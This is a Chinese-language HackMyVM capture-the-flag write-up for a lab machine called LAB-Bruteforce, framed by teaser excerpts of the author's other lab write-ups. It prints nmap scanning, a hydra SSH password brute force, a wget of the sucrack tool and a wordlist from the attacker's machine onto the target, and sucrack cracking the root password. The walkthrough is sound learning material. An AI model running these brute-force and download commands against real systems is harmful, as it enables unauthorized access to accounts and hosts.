信息搜集 主机扫描 端口扫描 路径扫描 发现我们可以利用文件头输入指令GitHub – VladR… 继续阅读hmv.blackhat
作者: wlx
hmv.arroutada
信息搜集 主机扫描 端口扫描 路径扫描 提示我们还有一个路径,但不知道是哪一个 发现一个pass.txt 发现… 继续阅读hmv.arroutada
hmv.luz
信息搜集 主机扫描 端口扫描 路径扫描 拿取shell 寻找有无可用漏洞 发现存在漏洞,看尝试能不能行得通 提… 继续阅读hmv.luz
hmv.uvalde
信息搜集 端口扫描 路径扫描 我们访问/create.php是随便登录,抓包,响应包文件头发现一个locati… 继续阅读hmv.uvalde
hmv.w140
信息搜集 主机扫描 端口扫描 路径扫描 在网站发现了一个可上传文件页面,我第一时间想的是上传一句话木马,无果,… 继续阅读hmv.w140
信息搜集
主机扫描
arp-scan -l
端口扫描
┌──(root㉿kali)-[/usr/share/seclists]
└─# nmap -sV -p- -Pn 192.168.56.91
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 10:19 EDT
Nmap scan report for 192.168.56.91
Host is up (0.00028s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
10000/tcp open http MiniServ 2.021 (Webmin httpd)
19000/tcp open netbios-ssn Samba smbd 4.6.2
19222/tcp open netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:50:8A:52 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
拿取shell
smb端口没发现什么有用的东西,于是就ssh爆破一下,看能不能爆破出来
hydra -l andrea -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000000.txt ssh://192.168.56.91
[STATUS] 112.00 tries/min, 336 tries in 00:03h, 9664 to do in 01:27h, 16 active
[STATUS] 105.14 tries/min, 736 tries in 00:07h, 9264 to do in 01:29h, 16 active
[22][ssh] host: 192.168.56.91 login: andrea password: awesome
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-27 11:55:06
d5eb7d8b6f57c295e0bedf7eef531360
提权
- 查看.bash_history
andrea@LAB-Bruteforce:~$ cat .bash_history
passwd
cd ..
ls
nano passwords.txt
sudo nano passwords.txt
su –
clear
exit
nano user.txt
clear
sudo -l
passwd
su –
su –
ls
cat user.txt
cd ..
ls
cd mattia
ls
cd testFolder
ls
cat REa
cat README.txt
cd ..
cd Desktop
ls
cd ..
cd .
find / -name passw.
find / -name passw*.txt
clear
find / -name *.txt
find / -name *.txt | grep -v “Permission”
find / -name *.txt | grep -v “Permission denied”
find / -name *.txt & grep -v “Permission denied”
find / -name *.txt && grep -v “Permission denied”
clear
ls
cd ..
ls
cd home
ls
cd mattia
ls
find / -name *.txt
ls
find / -name *.txt
exit
2. sudo -l 无权限
3. 定时文件什么都没有
4.下载linpeas.sh,一点思路没有(悲,看师傅的wp发现需要利用sucrack,爆破root的密码,嘶,真没想到
kali:
apt insatll sucrack
cd /usr/bin
python3 -m http.server
靶机:
/tmp目录下
wget ip/sucrack
chmod +x 777 sucrack
字典也下上,不然怎么爆破
ndrea@LAB-Bruteforce:/tmp$ wget http://192.168.56.205:8000/xato-net-10-million-passwords-10000.txt
--2024-04-27 19:16:33-- http://192.168.56.205:8000/xato-net-10-million-passwords-10000.txt
Connecting to 192.168.56.205:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 76497 (75K) [text/plain]
Saving to: ‘xato-net-10-million-passwords-10000.txt’
xato-net-10-million-passwords-10000. 100%[===================================================================>] 74.70K --.-KB/s in 0.003s
2024-04-27 19:16:33 (23.1 MB/s) - ‘xato-net-10-million-passwords-10000.txt’ saved [76497/76497]
andrea@LAB-Bruteforce:/tmp$ chmod +x xato-net-10-million-passwords-10000.txt
andrea@LAB-Bruteforce:/tmp$ ./sucrack -u root -w 123 xato-net-10-million-passwords-10000.txt
password is: 1998
andrea@LAB-Bruteforce:~$ su root
Password:
root@LAB-Bruteforce:/home/andrea# ls
user.txt
root@LAB-Bruteforce:/home/andrea# cd /root
root@LAB-Bruteforce:~# ls
root.txt vboxpostinstall.sh
root@LAB-Bruteforce:~# cat root.txt
Congratulations.
d2f74ec1ca3e40f6fa07f62d42eb9ea5
总结:
- 字典的选择,选择合适的字典太重要了,怎么选择字典是个问题
- 没想到这次需要sucrack爆破真没想到,也没有看到靶机内部提示,看来是跟靶机的名称是想匹配的,爆破实验室,不断地爆破,算是学会使用了一个新工具
hmv.friendly3
信息搜集 主机扫描 端口扫描 匿名登录ftp端口,错误,无法登录,但网站提示我了,内容在ftp中 路径扫描 什… 继续阅读hmv.friendly3
hmv.friendly2
信息搜集 主机扫描 端口扫描 目录扫描 在tools页面的源码发现疑似路径 访问发现,发现是参数+文件,查看源… 继续阅读hmv.friendly2
hmv.friendly
信息搜集 主机扫描 端口扫描 路径扫描 gobuster与dirsearch扫描都没有任何关键文件,没办法,扫… 继续阅读hmv.friendly
hmv.crack
主机扫描 端口扫描 端口信息搜集 我们发现本文件说明12349端口存在文件读取漏洞,实验证明发现确实是,但只能… 继续阅读hmv.crack